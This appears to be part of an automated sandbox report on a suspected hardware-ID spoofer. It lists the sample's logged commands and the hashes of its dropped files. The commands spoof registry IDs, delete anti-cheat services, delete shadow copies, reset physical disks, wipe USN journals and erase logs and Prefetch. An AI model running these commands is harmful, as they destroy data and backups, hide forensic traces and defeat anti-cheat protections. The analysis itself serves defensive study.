                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                          3⤵
                                                                                                                          • Modifies registry key
                                                                                                                          PID:4056
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                        2⤵
                                                                                                                          PID:4940
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t reg_SZ /d 1098321251-1005132058-662625648 /f
                                                                                                                            3⤵
                                                                                                                            • Modifies registry key
                                                                                                                            PID:4176
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t reg_BINARY /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                          2⤵
                                                                                                                            PID:4764
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t reg_BINARY /d 1098321251-1005132058-662625648 /f
                                                                                                                              3⤵
                                                                                                                              • Modifies registry key
                                                                                                                              PID:624
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t reg_BINARY /d %random%%random%-%random%%random%-%random%%random% /f
                                                                                                                            2⤵
                                                                                                                              PID:4644
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t reg_BINARY /d 1098321251-1005132058-662625648 /f
                                                                                                                                3⤵
                                                                                                                                • Modifies registry key
                                                                                                                                PID:2368
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f
                                                                                                                              2⤵
                                                                                                                                PID:4228
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                                                                                                  3⤵
                                                                                                                                  • Modifies registry key
                                                                                                                                  PID:3260
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f
                                                                                                                                2⤵
                                                                                                                                  PID:5048
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
                                                                                                                                    3⤵
                                                                                                                                    • Modifies registry key
                                                                                                                                    PID:868
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\MountedDevices /f
                                                                                                                                  2⤵
                                                                                                                                    PID:5084
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg DELETE HKLM\SYSTEM\MountedDevices /f
                                                                                                                                      3⤵
                                                                                                                                      • Modifies registry key
                                                                                                                                      PID:3836
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
                                                                                                                                    2⤵
                                                                                                                                      PID:504
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
                                                                                                                                        3⤵
                                                                                                                                        • Modifies registry key
                                                                                                                                        PID:4260
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
                                                                                                                                      2⤵
                                                                                                                                        PID:2716
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
                                                                                                                                          3⤵
                                                                                                                                          • Modifies registry key
                                                                                                                                          PID:3704
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1912
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
                                                                                                                                            3⤵
                                                                                                                                            • Modifies registry key
                                                                                                                                            PID:5076
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
                                                                                                                                          2⤵
                                                                                                                                            PID:4244
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
                                                                                                                                              3⤵
                                                                                                                                              • Modifies registry key
                                                                                                                                              PID:376
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                            2⤵
                                                                                                                                              PID:4944
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
                                                                                                                                                3⤵
                                                                                                                                                • Modifies registry key
                                                                                                                                                PID:872
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
                                                                                                                                              2⤵
                                                                                                                                                PID:992
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies registry key
                                                                                                                                                  PID:4252
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:4344
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies registry key
                                                                                                                                                    PID:1400
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v registersData /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2592
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v registersData /f
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies registry key
                                                                                                                                                      PID:3772
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2984
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies registry key
                                                                                                                                                        PID:700
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
                                                                                                                                                      2⤵
                                                                                                                                                        PID:352
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
                                                                                                                                                          3⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies registry key
                                                                                                                                                          PID:64
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3848
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies registry key
                                                                                                                                                            PID:164
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4132
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies registry key
                                                                                                                                                              PID:216
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3672
                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                net start winmgmt /y
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1712
                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                    C:\Windows\system32\net1 start winmgmt /y
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2596
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2992
                                                                                                                                                                    • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                      ipconfig /flushdns
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Gathers network information
                                                                                                                                                                      PID:4004
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh int reset all >nul
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3980
                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                        netsh int reset all
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3160
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:788
                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                            netsh int ipv4 reset
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2168
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3708
                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                netsh int ipv6 reset
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4724
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5000
                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                    netsh winsock reset
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4100
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4660
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell vssadmin delete shadows /all
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:3108
                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                          "C:\Windows\system32\vssadmin.exe" delete shadows /all
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                          PID:2868
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2312
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell Reset-PhysicalDisk *
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4772
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5048
                                                                                                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                            fsutil usn deletejournal /n C:
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:916
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4144
                                                                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                fsutil usn deletejournal /n D:
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                PID:508
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2644
                                                                                                                                                                                                • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                  fsutil usn deletejournal /n E:
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                  PID:4736
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2972
                                                                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                    fsutil usn deletejournal /n F:
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1912
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:832
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4244
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:376
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4944
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5064
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:992
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Solution.exe >nul
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2932
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Solution64.sys >nul
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2744
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Disk1.exe >nul
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:776
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Disk2.exe >nul
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3772
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Mac.bat >nul
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:2588
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4628
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3508
                                                                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x3b4
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:2836
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                              PID:3004
                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1460

                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      c6b0a774fa56e0169ed7bb7b25c114dd

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      bcdba7d4ecfff2180510850e585b44691ea81ba5

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      4c4a2aa3380856eb4e8780992f5d2736

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e746289381acdf2875e9e00fbb33f3af27a9b443

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      da92b0663439b9a18485e360dc65c8e4f07aaeae2212be2cabbd1b6f6f8d055b

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      300d2362ab3ecc95d1146c9fb9f91a2144dc9314bfe469a1234b044d79b5703f5a92a22ed329916ad9923928b492a7bfd300a67a36c46f37b81189e3ca29ed2b

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hd43bps3.ouo.ps1

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                                                                                                    • memory/3108-7-0x00000183F7C00000-0x00000183F7C22000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                    • memory/3108-10-0x00000183F7ED0000-0x00000183F7F46000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                                    • memory/4772-376-0x000001B2B4210000-0x000001B2B423A000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      168KB

                                                                                                                                                                                                                                    • memory/4772-395-0x000001B2B4210000-0x000001B2B4232000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136KB